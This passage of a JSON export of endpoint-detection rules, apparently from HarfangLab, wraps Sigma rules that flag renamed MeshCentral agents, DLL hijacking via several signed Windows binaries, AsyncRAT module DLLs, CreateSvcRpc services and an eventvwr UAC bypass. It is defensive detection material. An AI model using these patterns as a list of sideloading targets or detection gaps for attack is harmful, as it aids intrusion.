ProcessSignatureSignerIssuerName|startswith: 'MeshCentralRoot-'\n\n filter_legitimate_path:\n Image|startswith:\n - '?:\\Program Files\\Mesh Agent\\'\n - '?:\\Program Files (x86)\\Mesh Agent\\'\n\n filter_legitimate_name:\n Image|endswith: '\\MeshAgent.exe'\n\n exclusion_tacticalrmm:\n ParentImage:\n - '?:\\Program Files\\TacticalAgent\\tacticalrmm.exe'\n - '?:\\Program Files (x86)\\TacticalAgent\\tacticalrmm.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9c63e668-44a3-458f-973f-62af5e790af6",
"rule_name": "Abnormal MeshCentral Agent Execution",
"rule_description": "Detects the abnormal execution of a MeshCentral agent being executed on the target host.\nThis rule detects MeshAgent being executed with a renamed executable or from an unconventional directory.\nMeshCentral is a remote host control tool that can be used maliciously as a Remote Access Tool (RAT).\nIt is recommended to investigate the parent process for suspicious activities as well as to look for other malicious actions stemming from the installed MeshCentral agent.\n",
"rule_creation_date": "2022-10-06",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9c6edfa4-db0e-4777-9bfb-0973b944d5bc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590658Z",
"creation_date": "2026-03-23T11:45:34.590664Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590676Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sigverif.yml",
"content": "title: DLL Hijacking via sigverif.exe\nid: 9c6edfa4-db0e-4777-9bfb-0973b944d5bc\ndescription: |\n Detects potential Windows DLL Hijacking via sigverif.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sigverif.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9c6edfa4-db0e-4777-9bfb-0973b944d5bc",
"rule_name": "DLL Hijacking via sigverif.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sigverif.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9c8ee247-5c0d-4b48-b359-9c783295fa19",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095607Z",
"creation_date": "2026-03-23T11:45:34.095609Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095613Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_legacynetuxhost.yml",
"content": "title: DLL Hijacking via LegacyNetUXHost.exe\nid: 9c8ee247-5c0d-4b48-b359-9c783295fa19\ndescription: |\n Detects potential Windows DLL Hijacking via LegacyNetUXHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LegacyNetUXHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wlanapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9c8ee247-5c0d-4b48-b359-9c783295fa19",
"rule_name": "DLL Hijacking via LegacyNetUXHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via LegacyNetUXHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9cbee887-963e-4baf-92c7-ec0b87858928",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077655Z",
"creation_date": "2026-03-23T11:45:34.077657Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077661Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_nlb.yml",
"content": "title: DLL Hijacking via NLB.exe\nid: 9cbee887-963e-4baf-92c7-ec0b87858928\ndescription: |\n Detects potential Windows DLL Hijacking via NLB.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'NLB.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9cbee887-963e-4baf-92c7-ec0b87858928",
"rule_name": "DLL Hijacking via NLB.exe",
"rule_description": "Detects potential Windows DLL Hijacking via NLB.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9cd94b9b-183d-4cc3-8f2c-9ef79bd7d733",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094289Z",
"creation_date": "2026-03-23T11:45:34.094291Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094295Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_omadmrpc.yml",
"content": "title: DLL Hijacking via omadmrpc.exe\nid: 9cd94b9b-183d-4cc3-8f2c-9ef79bd7d733\ndescription: |\n Detects potential Windows DLL Hijacking via omadmrpc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'omadmrpc.exe'\n ImageLoaded|endswith:\n - '\\dmpushproxy.dll'\n - '\\omadmapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9cd94b9b-183d-4cc3-8f2c-9ef79bd7d733",
"rule_name": "DLL Hijacking via omadmrpc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via omadmrpc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9ce1f97a-87d5-4750-9c6d-729163e4c865",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086306Z",
"creation_date": "2026-03-23T11:45:34.086308Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086312Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/",
"https://twitter.com/malmoeb/status/1555926311738171398",
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1005_asyncrat_data_collection_dlls.yml",
"content": "title: AsyncRAT Data Collection DLL Written to Disk\nid: 9ce1f97a-87d5-4750-9c6d-729163e4c865\ndescription: |\n Detects the creation of DLLs files associated with AsyncRAT that allows for various data collection abilities.\n AsyncRAT is an open-source C-sharp C2 that is usually the last piece of the infection chain.\n AsyncRAT loads modules by downloading DLLs from the C2 server and dropping them on the local system.\n It is recommended to check the DLL for malicious content and the processes creating/loading the DLL for other suspicious activities.\nreferences:\n - https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/\n - https://twitter.com/malmoeb/status/1555926311738171398\n - https://attack.mitre.org/techniques/T1005/\ndate: 2022/08/08\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - classification.Windows.Source.Filesystem\n - classification.Windows.Malware.AsyncRAT\n - classification.Windows.Behavior.Collection\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path:\n - '?:\\Chat.dll'\n - '?:\\Extra.dll'\n - '?:\\FileManager.dll'\n - '?:\\FileSearcher.dll'\n - '?:\\LimeLogger.dll'\n - '?:\\Miscellaneous.dll'\n - '?:\\Options.dll'\n - '?:\\ProcessManager.dll'\n - '?:\\Recovery.dll'\n - '?:\\RemoteCamera.dll'\n - '?:\\RemoteDesktop.dll'\n - '?:\\SendFile.dll'\n - '?:\\SendMemory.dll'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9ce1f97a-87d5-4750-9c6d-729163e4c865",
"rule_name": "AsyncRAT Data Collection DLL Written to Disk",
"rule_description": "Detects the creation of DLLs files associated with AsyncRAT that allows for various data collection abilities.\nAsyncRAT is an open-source C-sharp C2 that is usually the last piece of the infection chain.\nAsyncRAT loads modules by downloading DLLs from the C2 server and dropping them on the local system.\nIt is recommended to check the DLL for malicious content and the processes creating/loading the DLL for other suspicious activities.\n",
"rule_creation_date": "2022-08-08",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9d004cbd-eea7-4a6c-a0ab-87f2313e82b9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599052Z",
"creation_date": "2026-03-23T11:45:34.599055Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599063Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.x86matthew.com/view_post?id=create_svc_rpc",
"https://attack.mitre.org/techniques/T1569/002"
],
"name": "t1569_002_createsvcrpc_default_service.yml",
"content": "title: CreateSvcRpc Service Installed\nid: 9d004cbd-eea7-4a6c-a0ab-87f2313e82b9\ndescription: |\n Detects the creation of the malicious CreateSvcRpc tool service.\n CreateSvcRpc is a tool that uses RPC to execute programs as the SYSTEM user, by creating a service.\n Adversaries can create services to elevate their privileges or achieve persistence.\n It is recommended to investigate the process responsible for the creation of this service and to look for other malicious activities on the host.\nreferences:\n - https://www.x86matthew.com/view_post?id=create_svc_rpc\n - https://attack.mitre.org/techniques/T1569/002\ndate: 2023/03/28\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.003\n - attack.execution\n - attack.t1569.002\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.ServiceCreation\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: system\ndetection:\n selection:\n EventID: 7045\n ServiceName: 'CreateSvcRpc_*'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9d004cbd-eea7-4a6c-a0ab-87f2313e82b9",
"rule_name": "CreateSvcRpc Service Installed",
"rule_description": "Detects the creation of the malicious CreateSvcRpc tool service.\nCreateSvcRpc is a tool that uses RPC to execute programs as the SYSTEM user, by creating a service.\nAdversaries can create services to elevate their privileges or achieve persistence.\nIt is recommended to investigate the process responsible for the creation of this service and to look for other malicious activities on the host.\n",
"rule_creation_date": "2023-03-28",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1543.003",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9d024265-ae4d-4cda-881f-ad0ed35e3605",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097784Z",
"creation_date": "2026-03-23T11:45:34.097786Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097790Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rdpshell.yml",
"content": "title: DLL Hijacking via rdpshell.exe\nid: 9d024265-ae4d-4cda-881f-ad0ed35e3605\ndescription: |\n Detects potential Windows DLL Hijacking via rdpshell.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rdpshell.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dwmapi.dll'\n - '\\WINSTA.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9d024265-ae4d-4cda-881f-ad0ed35e3605",
"rule_name": "DLL Hijacking via rdpshell.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rdpshell.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9d058b26-a1ae-4de9-adb0-eb2b31f22412",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093079Z",
"creation_date": "2026-03-23T11:45:34.093081Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093085Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_post_uac_bypass_eventvwr.yml",
"content": "title: UAC Bypass Executed via eventvwr\nid: 9d058b26-a1ae-4de9-adb0-eb2b31f22412\ndescription: |\n Detects a process being spawned by eventvwr.exe.\n Eventvwr.exe does not normally spawn any process, this action is probably the result of an UAC bypass attempt.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2021/01/04\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\eventvwr.exe'\n\n filter_mmc:\n Image|endswith:\n - 'Windows\\System32\\mmc.exe'\n - 'Windows\\SysWOW64\\mmc.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9d058b26-a1ae-4de9-adb0-eb2b31f22412",
"rule_name": "UAC Bypass Executed via eventvwr",
